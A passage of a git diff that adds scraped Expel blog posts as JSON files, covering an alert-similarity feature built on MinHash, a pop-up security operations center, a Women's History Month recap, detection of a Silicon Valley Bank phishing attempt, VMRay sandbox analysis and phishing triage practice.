have simple mechanisms in place to retrieve them regularly. Next, we needed to decide how to create vector embeddings. For the purposes of testing our hypothesis, we decided we didn\u2019t need to spend a ton of time perfecting how we did it. If you\u2019re familiar with generating embeddings, you\u2019ll know this usually turns into a never-ending process of improvement. To start, we just needed a baseline to measure our efforts against. To that end, we chose MinHash as a quick and easy way to turn our selected alerts into vector embeddings. What is MinHash and how does it work? MinHash is an efficient way to approximate the Jaccard Index between documents. The basic principle is that the more data shared between two documents, the more similar they are. Makes sense, right? Calculating the true Jaccard index between two documents is a simple process that looks like this: Jaccard Index = (Intersection of tokens between both documents) / (Union of tokens between both documents) For example, if we have two documents: The lazy dog jumped over the quick brown fox The quick hare jumped over the lazy dog We could calculate the Jaccard index like this: (the, dog, jumped, over, quick) / (the, lazy, dog, jumped, over, quick, brown, fox, hare) \u2192 5 / 6 \u2192 0.8333 This is simple and intuitive, but at scale it presents a problem: You have to store all tokens for all documents to calculate this distance metric. In order to calculate the result, you inevitably end up using lots of storage space, memory, and CPU. That\u2019s where MinHash comes in. It solves the problem by approximating Jaccard similarity, yet only requires that you store a vector embedding of length K for each document. The larger K, the more accurate your approximation will be. By transforming our input documents (alerts) into MinHash vector embeddings, we\u2019re able to efficiently store and query against millions of alerts. This approach allows us to take any alert and ask, \u201cWhat other alerts look similar to this one?\u201d Similar documents are likely good candidates for further inspection. Validating our hypothesis Once we settled on our vectorization approach (thanks, MinHash!), we tested our hypothesis. By calculating the similarity between all alerts for a specific time period, we confirmed that 5-6% of alerts had similar neighbors (Fig 2.). Taking that even further, our metrics allowed us to estimate actual time savings for our analysts (Fig 3.). Fig. 2: Percentage of alerts with similar neighbors Fig 3. Estimated analyst hours saved (extrapolated) These metrics proved that we were onto something. Based on these results, we chose building an Alert Suggestion capability off the back of Alert Similarity as our first use case to target. This use case would allow us to improve efficiencies in our SOC and, in turn, enhance the level of service we provide to our customers. Our journey to production Step 1: Getting buy-in across the organization Before moving full speed ahead into our project, we communicated our research idea and its potential benefits across the business. The TL;DR here? You can\u2019t get your colleagues to buy into a new idea unless they understand it. Our R&D groups pride themselves on never creating \u201cTad-dah! It\u2019s in production!\u201d moments for Engineering or Product Management without them having the background on new projects first. We created a presentation that outlined the opportunity and our research, and allowed Expletives (anyone from Product Management to Customer Success to Engineering) to review our proof of concept. In this case, we used a heavily documented notebook to walk viewers through what we did. We discussed our go-forward plan and made sure our peers across the organization understood the opportunity and were invested in our vision. Step 2: Reviewing the design Next, we created a design review document outlining a high-level design of what we wanted to build. This is a standard process at Expel and is an important part of any new project. This document doesn\u2019t need to be a perfect representation of what you\u2019ll end up building, nor does it need to include every last implementation detail, but it does need to give the audience an idea of the problem you\u2019re aiming to solve and the general architectural design of the solution you\u2019re proposing. Here\u2019s a quick look at the design we mocked up to guide our project: As part of this planning process, we identified the following goals and let those inform our design: Build new similarity-powered features with little friction Monitor the performance and accuracy of the system Limit complexity wherever possible (don\u2019t reinvent the wheel) Avoid making the feature availability mission critical (so we can move quickly without risk) As a result of this planning exercise, we concluded that we needed to build the following components: Arnie (Artifact Normalization and Intelligent Encoding): A shared library to turn documents at Expel into vector embeddings Vectorizor consumer: A worker that consumes raw documents and produces vector embeddings Similarity API: A grpc service that provides an interface to search for similar documents We also decided that we wouldn\u2019t build our own vector search database and instead decided to use Pinecone.io to meet this need. This was a crucial decision that saved us a great deal of time and effort. (Remember how we said we wouldn\u2019t reinvent the wheel?) Why Pinecone? At this stage, we had a good sense for our technical requirements. We wanted sub-second vector search across millions of alerts, an API interface that abstracts away the complexity, and we didn\u2019t want to have to worry about database architecture or maintenance. As we examined our options, Pinecone quicky became our preferred partner. We were really impressed by the performance we were able to achieve and how quick and easy their service was to set up and use. Step 3: Implementing our Alert Similarity feature We\u2019re lucky to have an extremely talented core platform team here at Expel infrastructure capabilities we can reliably build on. Implementing our feature was as simple as using these building blocks and best practices for our use case. Release day Once the system components were built and running in staging, we needed to coordinate a release in production that didn\u2019t introduce risk into our usual business operations. Alert Suggestion would produce suggestions in Expel Workbench like this, which could inform decisions made by our SOC analysts. However, if our feature didn\u2019t work as expected \u2013 or worse, created incorrect suggestions \u2013 we could cause confusion or defects in our process. To mitigate these risks when moving to production, it was important to gather metrics on the performance and accuracy of our feature before we started putting suggestions in front of our analysts. We used LaunchDarkly and Datadog to accomplish this. LaunchDarkly feature flags allowed us to deploy to production silently \u2013 meaning it runs behind the scenes and is invisible to end users. This allowed us to build a Datadog dashboard with all kinds of useful metrics like: How quickly we\u2019re able to produce a suggestion The percentage of alerts we can create suggestions for How often our suggestions are correct (we did this by comparing what the analyst did with the alert versus what we suggested) Model performance (accuracy, recall, F1 score) The time it takes analysts to handle alerts with and without suggestions To say these metrics were invaluable would be an understatement. Deploying our feature silently for a period of time allowed us to identify several bugs and correct them without having any impact on our customers. This boosted confidence in Alert Similarity before we flipped the switch. When the time came, deployment was as simple as updating a single feature flag in LaunchDarkly. What we\u2019ve learned so far We launched Alert Similarity in February 2022, and throughout the building process we learned (or in many cases, reaffirmed) several important things: Communication is key. You can\u2019t move an organization forward with code alone. The time we spent sharing research, reviewing design documents, and gathering feedback was crucial to the success of this project. There\u2019s nothing like real production data. A silent release with feature flags and metrics allowed us to identify and fix bugs without affecting our analysts or customers. This approach also gave us data to feel confident that we were ready to release the feature. We\u2019ll look to reuse this process in the future. If you can\u2019t measure it, you don\u2019t understand it. This whole journey from beginning to end was driven by data, allowing us to move forward based on a validated hypothesis and realistic goals versus intuition. This is how we knew our investment was worth the time and how we were able to prove the value of Alert Similarity once it was live. What\u2019s next? Although we targeted suggestions powered by Alert Similarity as our first feature, we anticipate an exciting road ahead filled with additional features and use cases. We\u2019re interested in exploring other types of documents that are crucial to our success and how similarity search could unlock new value and efficiencies. Additionally, as we alluded to above, there\u2019s always room for improvement when transforming documents into vector embeddings. We\u2019re already exploring new ways to represent security alerts that improve our ability to find similar neighbors for alerts. We see a whole world of opportunities where similarity search can help us, and we\u2019ll continue experimenting, building and sharing what we learn along the way. Interested in more engineering tips and tricks, and ideas for building your own features to enhance your service (and make your analysts\u2019 lives easier?) Subscribe to our blog to get the latest posts sent right to your inbox." +} \ No newline at end of file diff --git a/how-we-built-it-the-expel-soc-in-the-sky.json b/how-we-built-it-the-expel-soc-in-the-sky.json new file mode 100644 index 0000000000000000000000000000000000000000..fa6eaad58c1073a11ac887a5714f5f2669b5a71f --- /dev/null +++ b/how-we-built-it-the-expel-soc-in-the-sky.json @@ -0,0 +1,6 @@ +{ + "title": "How we built it: the Expel SOC-in-the-Sky", + "url": "https://expel.com/blog/how-we-built-it-the-expel-soc-in-the-sky/", + "date": "Mar 10, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How we built it: the Expel SOC-in-the-Sky Expel insider \u00b7 2 MIN READ \u00b7 JON HENCINSKI \u00b7 MAR 10, 2023 \u00b7 TAGS: MDR This February, over 400 Expletives flocked from all over to convene in Miami for our first-ever company kickoff (CKO) celebration. It was a week of laughs, collaboration, excitement, and, for some of us, in-person introductions to co-workers we\u2019ve only ever met via Zoom. But with great events come great logistical challenges, particularly for a 24\u00d77 service like ours. So the question became: how do we ensure the hardworking folks in the Expel security operations center (SOC), who so often devote their nights and weekends to our customers, can also come to Miami and benefit from in-person camaraderie? Turns out, the answer was a \u201cSOC-in-the-Sky.\u201d This meant converting a multi-purpose room on the top floor of the hotel hosting CKO (S/O to the Hyatt Regency, Miami) into an around-the-clock mobile SOC\u2014which we called SOC-in-the-Sky because how cool does that sound? The team touched down the Saturday before the festivities and got to work outfitting the space with the necessary infrastructure. That included making sure we had things like external monitors, privacy screens, redundant power supplies, fast internet connections, and just the right amount of physical security to protect the space. And of course, the requisite amount of energy drinks. Now, it\u2019s a SOC. All of these details set up our SOC for success to do what they do: monitor and defend more than 300 customers and their entities from cyber attacks. To put that into perspective, over 300 customers and their entities means continuously: monitoring millions of endpoints, identities, cloud resources and workloads distributed across five different continents, and providing phishing expertise to hundreds of thousands of people around the world. Over the course of a typical day in our SOC-in-the-Sky, we processed around 2.5-3.5 billion events from 100+ tech integrations with our platform. Those events were all processed through Josie\u2122, our detection bot, who filtered and passed better than a thousand events to the Expel team for human judgment. Those filtered events were then picked up in mere minutes by our SOC analysts. The SOC team runs hundreds of investigative actions through Expel Workbench\u2122, our security operations platform, and in the process they identify somewhere between 10-15 security incidents for multiple customers. These security incidents are a mix of account takeover activity, deployment of malware to gain initial access by ransomware operators, abuse of cloud misconfigurations, and authorized red teams. Ruxie\u2122, our orchestration bot, runs thousands of investigative actions on behalf of our analysts. Ruxie is also smart enough to make triage decisions\u2014it closes around 5% of the alerts sent to the Expel SOC for review and handles about a third of all investigations performed in any given day. Let\u2019s see, what else? Oh, right. We investigate around 1,000 suspicious email submissions from our customers each day. How the heck do we do it? We put information and people in the exact right place at the exact right moment. The net of it all is we\u2019re able to take billions of events, use the right mix of people and technology to find the things that matter quickly, figure out what happened, and take action to reduce risk. This is what happened in the SOC-in-the-Sky. It was the physical representation of the intersection of our platform and our people, each doing what they do best. Want a deeper dive into the patterns and trends our SOC identified last year? Check out our annual threat report, Great eXpeltations , for a behind-the-scenes peak." +} \ No newline at end of file diff --git a/how-we-celebrated-women-s-history-month-at-expel.json b/how-we-celebrated-women-s-history-month-at-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..c72b5e960e097d35bedd898aabcf40d60d4db061 --- /dev/null +++ b/how-we-celebrated-women-s-history-month-at-expel.json @@ -0,0 +1,6 @@ +{ + "title": "How WE celebrated Women's History Month at Expel", + "url": "https://expel.com/blog/how-we-celebrated-womens-history-month-at-expel/", + "date": "Apr 7, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How WE celebrated Women\u2019s History Month at Expel Talent \u00b7 3 MIN READ \u00b7 BROOKE MCCLARY AND NEIKO LAMPKIN \u00b7 APR 7, 2023 \u00b7 TAGS: Careers / Company news We never pass up the opportunity to celebrate women at Expel, and Women\u2019s History Month in March is one of our favorite times of the year to do just that. We\u2019re pretty proud of our employee resource groups (ERGs) at Expel\u2014which include BOLD (our ERG for Black Expletives and allies), The Treehouse (our LGBTQIA+ and allies), The Connection (for supporting each others\u2019 mental health), and WE (the Women of Expel and allies). Founded in 2018, WE was Expel\u2019s first ERG, and we\u2019ve since reorganized and expanded to capture the spirit of the crew that\u2019s helping to power, scale, shape, and drive the company to ever-greater heights. This year\u2019s WE Women\u2019s History Month programming centered on the interconnectivity between all our ERGs and focused on how we can elevate each other, both in March and year-round. Here\u2019s a quick recap. WE heard\u2014and learned\u2014from Dr. Kumea Shorter-Gooden. Early in the month, our WE and BOLD ERGs co-hosted an engaging discussion led by Dr. Kumea Shorter-Gooden , co-author of Shifting: The Double Lives of Black Women in America. Dr. Shorter-Gooden\u2019s session, \u201cDoing Double Duty: Black Women in the World of Work,\u201d addressed common ways Black women are forced to \u201cshift\u201d as a response to racial and gender bias in the workplace. Dr. Shorter-Gooden acknowledged that Black women\u2019s mistakes are often hyper-visible, yet successes are invisible; this is a vexing challenge that\u2019s near-impossible to navigate. She offered advice on how allies can show up for Black women and others with marginalized identities, and attendees left with a better understanding of the lived experiences of our fellow Expletives. WE highlighted badass change-makers from the past 25 years. Each week, we celebrated a woman from recent history who forged a path for herself and others, with each spotlight focusing on someone representing one of our ERGs. The list included: Amanda Gorman : The youngest inaugural poet (at just 22) in U.S. history. You might remember her from President Biden\u2019s inauguration, where she delivered an original poem titled, \u201cThe Hill We Climb.\u201d Rosemary Ketchum : In 2020, Rosemary shattered the \u201c lavender ceiling \u201d and became the first out trans person to be elected in West Virginia. Bren\u00e9 Brown : A research professor at the University of Houston who holds a doctoral degree in social work, Bren\u00e9 is famous for her viral talks on a range of uncomfortable emotions. Taraji P. Henson : Actress, producer, author, and long time mental health advocate, Taraji founded the Boris Lawrence Henson Foundation in 2018 with a focus on providing options for therapy to Black men in particular. WE spotlighted the women of Expel who make a big impact, every day. We also took some time to recognize and celebrate each other with daily Slack spotlights the on women Expletives who make a big impact across our organization. Our own Nicole Jouvelakas, Director, Growth Marketing, collected survey responses from anyone interested in submitting across the entire organization. And the results were inspiring. An example of a daily Slack spotlight celebrating the women of Expel Why did we do this? Because when we lift each other up, we all benefit. We also heard from Tina Velez, Manager, Solution Architecture, in our LnL (Live \u2018n\u2019 Learn) series, where she walked us through each of her career stops. This riveting discussion, which she called \u201cI love fire,\u201d focused on the challenges she faced working in male-dominated fields and, most importantly, how she overcame the headwinds to succeed every time. WE visited Sweetbriar College for an important Women in Tech Panel. On March 30, members of our WE ERG took a short road trip to Sweetbriar College to host a Women In Tech Panel showcasing what it\u2019s like to work in tech, and the variety of roles within the tech space (in fewer words: you don\u2019t have to be an engineer to work in tech) . Sweetbriar has one of only two (Accreditation Board for Engineering and Technology) ABET-accredited engineering programs at women\u2019s colleges in the United States. WE participated in InHerSight\u2019s Women\u2019s History Month campaign. InHerSight \u2014an anonymous platform measuring how well companies support women employees\u2014used March to highlight some of the amazing women at its partner companies. They asked \u201cwomen to tell [them] why they\u2019re proud of their background or how their identity influences how they show up, whether for work or life.\u201d Expel\u2019s Orianna Bilby, Principal Program Manager, Engineering, answered the call, resulting in this LinkedIn feature. Orianna shares her perspective with InHerSight WE explored the intersectionality of women\u2019s stories with those of other marginalized groups. First, BOLD\u2019s monthly discussion centered on Centering Black Muslim Women during Women\u2019s History Month and Ramadan . Attendees spent time Listening to the Stories of Black Muslim Women and discussed ways to be mindful of women\u2019s experiences, the role intersectionality plays in the unique experiences of women that belong to additional marginalized groups, and our own personal experiences with holding those within our circles accountable in our fight for a just, equitable, and inclusive society for women. Then the monthly Treehouse session considered the Divine Feminine . This open dialogue revolved around defining the concept, how members personally connect with it, and how it affects social and political spaces. Like we said up top, we never pass up the opportunity to celebrate women at Expel\u2014and that won\u2019t stop after March. Keep an eye on our socials ( @ExpelSecurity ) throughout the year as we periodically highlight our women colleagues, and check out our equity, inclusion, and diversity (EID) page to learn more about our ERGs." +} \ No newline at end of file diff --git a/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt.json b/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt.json new file mode 100644 index 0000000000000000000000000000000000000000..e4c88a01c7c9dc73006c62b73712616643b3d36b --- /dev/null +++ b/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt.json @@ -0,0 +1,6 @@ +{ + "title": "How we spotted it: A Silicon Valley Bank phishing attempt", + "url": "https://expel.com/blog/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt/", + "date": "Mar 24, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How we spotted it: A Silicon Valley Bank phishing attempt Security operations \u00b7 2 MIN READ \u00b7 HIRANYA MIR, JOSE TALENO AND CHRISTINE BILLIE \u00b7 MAR 24, 2023 \u00b7 TAGS: MDR / Tech tools As we wrote recently , we expected the failure of Silicon Valley Bank (SVB) to open the door to counterparty fraud attempts. Our CISO Greg Notch explained: An increased volume of bank account switching presents a massive opportunity for payment counterparty fraud. If an attacker is able to deceive someone into altering a few account and routing numbers, they can direct money to themselves, rather than your vendor or into your own accounts. Often this begins with compromised or forged emails resulting from business email compromise (BEC). Depending on the size of your environment, this may go unnoticed for some time. By the time you detect the attack, you could be out a significant amount of money\u2014and you\u2019ll still owe your vendor. As expected, it wasn\u2019t long before we saw our first fraud attempt via phishing attack. Since we knew our customers would likely be targets of SVB phishing attempts, our security operations center (SOC) analysts were on it before the customer could even submit the suspicious email to our phishing team. Here\u2019s how we did it. First, our analysts created a YARA rule to help identify any emails with affiliated keywords or domains, automatically adding them into our high-priority investigation queue. As it turns out, this is exactly how the attack began (see step 1 in the below graphic). A rule match increased the severity of the alert in our queue in order to get eyes on it ASAP, and we noted that the email headers displayed signs of possible spoofing. (When we see the \u201cspf=fail\u201d value, we\u2019re immediately suspicious.) From there, we saw that the sender\u2019s IP address wasn\u2019t affiliated with DocuSign, so there were red flags popping up all over. In step 2, we examined the body of the email. The email address\u2014kycrefreshteam@svb.com\u2014is the sender posing as an SVB employee. It\u2019s important to note this email did not actually come from anyone at SVB. However, the attacker is impersonating an employee to masquerade as a legitimate party. At first glance, the email looks legitimate. There are no obvious spelling, grammar, or punctuation errors. However, given the circumstances surrounding the collapse of the bank and the red flags identified in step 1, we\u2019re closer to knowing for sure that this is a phishing attempt. It\u2019s standard practice in our SOC to double-check any risks associated with action requests within an email, which we see in step 3. The \u201creview documents\u201d button in the email leads to an illegitimate customer login page, spoofed to mimic a page on the customer\u2019s website, which asks users to submit their SVB account credentials. In this case, our custom YARA detection rule\u2014set up to flag specific malicious domains for SVB\u2014flagged the phishing attempt for additional urgency and scrutiny , but we essentially go through the same sort of investigation for any suspicious email that customers submit to our phishing team. Unfortunately, we expect to see more of this sort of activity in the coming days and weeks, especially as the banking industry navigates some choppy waters. If you\u2019re interested in our phishing offering, click here to learn more." +} \ No newline at end of file diff --git a/how-we-use-vmray-to-support-expel-for-phishing.json b/how-we-use-vmray-to-support-expel-for-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..df784fb3eadbc50d19869be0fc83228176ef77da --- /dev/null +++ b/how-we-use-vmray-to-support-expel-for-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "How we use VMRay to support Expel for Phishing", + "url": "https://expel.com/blog/how-we-use-vmray-to-support-expel-for-phishing/", + "date": "Sep 21, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How we use VMRay to support Expel for Phishing Security operations \u00b7 4 MIN READ \u00b7 RAY PUGH AND HIRANYA MIR \u00b7 SEP 21, 2021 \u00b7 TAGS: MDR / Tech tools Tech helps us create space to focus on building human expertise. For example, tools like VMRay allow us to use a hands-on approach to phishing email triage here at Expel. Automated email solutions are an excellent supplement, but there\u2019s no replacement for human eyes on a suspicious sample that slips through the cracks. TL;DR: We harness the human moment to identify the full scope of risk to our customer\u2019s environments. As part of our phishing service, we use automation to triage phishing emails , and our analysts look at every email that our customers\u2019 users report. We also help our customers get the full picture of what\u2019s happening in their environment by integrating with their endpoint detection and response (EDR) tools. How does it work? First, a customer end-user hits the suspicious email reporting button, which generates an alert for analyst review in the Expel Workbench\u2122. Enrichment and automation surface supplementary information in an easily digestible way. From there, we decide whether the email is benign or poses a threat to the customer environment. When a threat is found, we quickly get to work answering two key questions: Who else received this email? Was anyone compromised? To answer these questions, we connect to the customer\u2019s tech stack \u2013 whether it\u2019s email message trace logs stored in their SIEM, network traffic monitored through their firewall or endpoint signal through their EDR. We use the indicators from a malicious email and the tech stack to determine whether compromises are present in the environment. If we spot a compromise, we notify our customer immediately so we can work in parallel to get the threat remediated. In this post, we\u2019ll walk you through how we use VMRay for our Expel managed phishing service , and share our thoughts on how VMRay can help you protect your org\u2019s environment. Tools we use to investigate potentially malicious emails We use both internally built tools as well as enrichment pulled through third-party sources to perform analysis. The most important capability in our investigative toolkit is VMRay. Whether it\u2019s investigating a suspicious link that redirects to a credential harvester or a suspicious Microsoft Word document that may contain malicious macros \u2013 VMRay allows us to detonate these samples safely and generate a detailed report of resulting activity. Armed with this information, we provide detailed, thorough recommendations to our customers. Why we chose VMRay VMRay integrates well with our approach because, whether it\u2019s through manual input in the VMRay console or uploading content through the API, we\u2019re able to send numerous samples at one time for analysis simultaneously. This tech gives our analysts the space to multitask and, as a result, ensure we provide timely results and responses to our customers. Considering we operate in an industry where minutes matter \u2013 this can make all the difference when it comes to stopping evil before bad things happen. VMRay also makes it easy to interact with malicious content. It performs analysis automatically, and offers an interactive mode when needed. And, again, we love that it generates detailed analytical findings reports. Investigating a phishing email using VMRay We routinely use VMRay for two types of email threats: suspicious links within the body of an email and suspicious files included with an email as attachments. For suspicious links, we submit the URL in question to VMRay for both static and dynamic analysis, defaulting to automated mode and including interactive mode in some circumstances. This provides our analysts with the flexibility to simulate a normal user and extract all of the malicious indicators safely. The detailed report available immediately following analysis serves as the basis for scoping the customer\u2019s environment for signs of compromise. Below is an example of what one of these reports look like. VMRay web analysis report VMray\u2019s web analysis report tells us that there\u2019s a redirect to another site which contains a logon page. This is a key indicator that we\u2019re dealing with a credential harvesting page. Example VMRay visual cue VMray generates screenshots after its analysis report to provide visual cues. In this case, we observe a suspicious URL enticing the user to interact with another link to access a fake proposal document. Credential harvesting landing page After the user interacts with the link they\u2019re redirected to a credential harvesting landing page Fake sign-in page example In the image above, you see that after several attempts the user is redirected to a Microsoft page which gives the illusion that it\u2019s legitimate. Microsoft Defender for Endpoint You\u2019ll see that we use Microsoft Defender for Endpoint to identify potential clickers by scoping for the malicious domains on the endpoint. Microsoft Defender for Endpoint Since we didn\u2019t generate any results scoping the malicious domain, we can confidently conclude that no one was compromised. Some malware is configured to detect and evade sandboxes, so VMRay simulates a realistic user endpoint complete with files, user profiles, simulated cursor movement and other attributes to combat this attacker technique and fool the malware into executing. If malicious, the file executes thinking it landed on an unsuspecting host and VMRay tracks all of its behavior. At the end, our analysts are able to review the results for key indicators which we can use to scope the customer\u2019s environment for signs of compromise. VMRay dynamic analysis Above is a screenshot of a VMray dynamic analysis report. What we\u2019re seeing indicates that the Excel file contains VBA macros which is a common way attackers embed malicious code. Another interesting observation is that upon execution it creates a process \u201ccurl\u201d suggesting the file maybe trying download another payload. How we use VMRay to further scope our customer\u2019s tech for signs of compromise Analysts use the indicators from the VMRay analysis to scope the respective customer\u2019s environment for any signs of potential compromise. The Expel Workbench lets our analysts query automatically through the API, but analysts can also pivot directly into the console for further investigation when necessary. If there aren\u2019t signs of compromise, which is often the case as we aim to stay ahead of the threat, we give our customers succinct recommendations to stop the threat in its tracks. In cases where signs of active compromise are discovered, we engage the customer immediately for remediation and work collaboratively until the situation is fully resolved. How you can use VMRay in your own environment We\u2019ve continually expanded our managed phishing service , which is why we\u2019ve made an optimized integration with VMRay and its suite of capabilities a priority. This helps us maintain efficiency and accuracy while minimizing risk for our analyst team. Analyzing numerous samples at the same time while gathering detailed data about each sample is truly a game changer, especially for a pervasive industry threat like phishing. Lastly, the features and ease of use help analysts of all experience levels build their investigative muscles. Automating key pieces of the investigative process helps to speed up the already steep learning curve for newer team members. Phishing attacks are on the rise \u2013 especially business email compromise (BEC). Want to find out how we protect our customers from BEC? Check out Expel for Email ." +} \ No newline at end of file diff --git a/improving-the-phishing-triage-process-keeping-our.json b/improving-the-phishing-triage-process-keeping-our.json new file mode 100644 index 0000000000000000000000000000000000000000..fd3d726f2e2f150d8279016fd8f99b7dcb7f4eb8 --- /dev/null +++ b/improving-the-phishing-triage-process-keeping-our.json @@ -0,0 +1,6 @@ +{ + "title": "Improving the phishing triage process: Keeping our ...", + "url": "https://expel.com/blog/improving-the-phishing-triage-process/", + "date": "Jan 5, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Improving the phishing triage process: Keeping our analysts (and our customers) sane Security operations \u00b7 8 MIN READ \u00b7 BEN BRIGIDA, PETER SILBERMAN AND RAY PUGH \u00b7 JAN 5, 2021 \u00b7 TAGS: MDR / Tech tools Manually triaging phishing emails is painful. We\u2019ve heard from customers that of those who employ analysts in house to focus solely on phishing, the retention rate of those employees is usually less than a year. No wonder. The work is never-ending. Billions of malicious emails are sent each day. And that\u2019s not even the bulk of it. End users, if properly trained, will smash the phishing reporting button for anything suspicious or annoying. Plenty of marketing emails and spam messages get caught in the nets (sorry, marketers \u2013 just calling it like we see it). This tedious work is what makes triage so painful. Analysts have to figure out if the email is bad, and if it is, they need to investigate it. According to APWG\u2019s 2020 Phishing Activity Trends Report , attackers create nearly 200,000 unique malicious websites and over 100,000 unique malicious subjects per month. That\u2019s a lot of copy-pasting. Yet the importance of reviewing reported phishing emails can\u2019t be understated. Phishing is the primary source of compromises , and has been for some time . So how do you balance the importance of reviewing phishing emails with the monotony of the work? That\u2019s exactly what we\u2019re working to solve for here at Expel. Get the right people and then build the right tech First, we set out to solve the people problem. By that we mean: how can we do high-quality work without making our people miserable? We assembled a diverse, enthusiastic team of skilled analysts. ( This piece is really important .) Next, we set out to change the game and make phishing triage phun again (can\u2019t stop, won\u2019t stop). At Expel we believe analysts need meaningful and interesting work. So we had to figure out how to make phishing meaningful to us while also delivering value to our customers. We decided we don\u2019t want to stop at just telling our customers that an email is bad. We also want to tell them things like; who else got the email and was anyone compromised (meaning someone clicked the link and submitted data, downloaded/executed the attachment, etc). These are the questions we think are most important to our Expel for Phishing customers. And we think they should be important to anyone providing or buying a phishing service. To accomplish this, and make the work engaging for our analysts, we use all the technology in our customer\u2019s environment that Expel supports (a total of 55 different integrations) to actually investigate (yes, we look at things like EDR, netflow \u2013 gasp \u2013 and URL logs) and work to answer the questions above. Great start, but how do you take tedious work and make it scalable? If you\u2019ve read our previous blog posts , you\u2019ll know how strongly we believe that humans are best suited for making decisions and building relationships. Everything else (like gathering data, crunching numbers and formatting data) is better suited for technology to handle. Based on our experience doing this, we think that when you apply technology to aid humans, you should automate what you understand (not what you think), then measure and iterate. So we built technology to automate the tedious steps we knew existed.The goal of this automation is to provide the right information at the right time for the analyst to make a decision. We call this \u201cdecision support\u201d (keep an eye out for a future blog on this topic). We want to make it so that our analysts can make informed decisions ( quickly ) and do what they enjoy most \u2013 finding bad guys and ruining their day. Want a breakdown of how we make decisions about phishing emails? Gon\u2019 give it to ya Just like attacker tactics are constantly evolving, we\u2019re continuously improving our approach for automation and decision support to help keep our analysts fresh and focused. Let\u2019s take a look at an example that was submitted for review. Phishing email example First things first: Is this email benign or malicious? We have a framework we use to train our analysts to answer this question. The framework helps break down what to think about when triaging an email. The three buckets of our phishing investigation framework are: Impersonation \u2013 Are there signs the sender is impersonating someone (is Simon really emailing our accounting department)? Is the link impersonating a legit domain (typosquatting)? Is the attachment posing as an image file when it\u2019s actually a different file type altogether? Are there typos? Intent \u2013 Does the activity we\u2019re seeing make logical sense (would \u201cSimon\u201d email us about an overdue invoice)? Are the indicators consistent with legit email traffic? How would an attacker benefit from this? Are they asking for sensitive information that a legitimate person or institution would already know? Action \u2013 Is the user prompted to take action? Is the subject matter financially motivated? Are they directed to click the link or download a file? Is there a sense of urgency (Is \u201cSimon\u201d demanding payment right away)? The technology we\u2019ve built supports surfacing information relevant to the various themes. The first focus of our decision support was to make it fast and easy to look at the email. We safely and securely render the email and produce a PNG of the rendered email. This can tell an analyst a lot about the email. This also helps quickly eliminate things like marketing emails that were submitted for review. In addition we use third-party data enrichment to gather additional context about the sender, receiver and more. For example, we\u2019re huge fans of emailrep.io and we use them to surface context on how reputable the email sender is. Below is an example of what we\u2018ll see in the Expel Workbench\u2122: Example of automated decision support In addition we use other services to surface context on IP , domain, information on whether file attachments are present and what the files do. All of this provides almost instant, meaningful decision support to our analysts. As we operated the service, we also noticed a lot of duplicate emails. Usually, the only thing changed might be the signature block or the sender but the overall intent of the email was unchanged. Using machine learning to find similar emails To help our analysts with answering the question of whether they\u2019ve already seen a similar email, we deployed a machine learning model that creates text embeddings of the email so that we can subsequently find semantically similar emails (if there are any) and surface those to our analysts. Example of similar email scoring Establishing a cycle of quality control checks With technology and automation comes an often overlooked responsibility of continuous quality control and improvement. We use manual quality control (QC) checks. The nice thing about QC checks is that they aren\u2019t just serving the purpose of reviewing what the automation is producing; they\u2019re also identifying new areas that can be automated. Part of our QC checks review what our analysts are doing. Are they performing repetitive tasks, tasks that are error prone or tasks that are better done by technology? If so, that could be an opportunity for automation. At Expel we\u2019ve talked about some of our security operations quality checks . In building out the Expel for Phishing service we developed a separate set of quality control checks. Our structured QC process entails a daily review process to make sure the technology and analyst outcomes meet our high-quality standards. Just like the MDR service, we review a sample of phishing investigations each day to make sure that we\u2019re making the right decisions and, just as important, we took the right steps to reach the conclusion. A second set of eyes can offer a unique perspective \u2013 we have made a number of feature requests based on these reviews. We\u2019re talking about things from typosquatted domains identification to formatting changes in the results to draw attention to important info. In the past 3,000 emails we analyzed, about 85 percent of them are benign (marketing emails, sales emails and generic spam). Finding ways to quickly spot and dispatch harmless emails is equally important for scaling our team. Sifting through benign emails and identifying the true threats is just the beginning of our process. This is where the real meaningful work (i.e. fun for an analyst) begins. Investigating a malicious email Like I mentioned before, while other services can tell you if an email is bad or not, we think that\u2019s not enough. We need to be able to answer those important questions (Who else received this email? Was anyone compromised?). Well, this is the part where I tell you how we get to those answers quickly. Our integrations with customer\u2019 security technology via the Expel Workbench platform gives us the ability to go deeper than other phishing services and actually answer these questions. The screenshot below shows an example of an investigative step that demonstrates the way we use our customer\u2019s security investment to get to answers. In this situation, the analyst confirmed that a phishing website was collecting user credentials. We wanted to see who else across the enterprise had accessed the domain. The analyst used what we call an \u201cinvestigative action,\u201d which asks multiple customer onboarded security technologies the same question without the analyst having to worry about the vendor specifics of how, since the platform takes care of that. Here the investigative action run was Query Domain, and the analyst looked for any evidence that a user in the enterprise visited the domain in question. In this case, the platform queried an EDR, SIEM and firewall. Then, all the results were returned for the analyst to review. Based on URL logs generated by the firewall (and a lack of SSL) the analyst could confirm that data was transferred to the website for a number of users. Abstracting away the intricacies of each technology and giving our analysts tools, like investigative actions that run across all onboarded security devices, allows them to spend their time focusing on asking and answering investigative questions. Example investigative action in Expel Workbench Quick action is key for minimizing risk. Even with our automation and platform, investigating and writing a report takes a little time. We didn\u2019t like that, so, as we investigate, we take advantage of the transparent platform to skip right to the part where we tell the customer what they need to start remediating. We give our customer security team a heads up that we\u2019ve found something malicious, send them a list of the indicators of compromise (IOCs) we have at that point and recommendations to mitigate as much risk as possible. All of this uses automation and happens in a few clicks. These notifications are delivered via email, Microsoft Teams, Slack, PagerDuty or any combination the customer chooses. Expel Workbench Notification example When we do find a compromise (like a phishing email that tricked a user into submitting creds or running malware), we provide immediate notification with specific remediation actions for the additional IOCs. We know that the customer team is busy, so we provide clear steps on exactly what to do. We also make sure our analysts are available to answer any questions every step of the way. Example Findings Report How this all helps our customers One of the few things analysts, customers and attackers agree on; there\u2019s a big 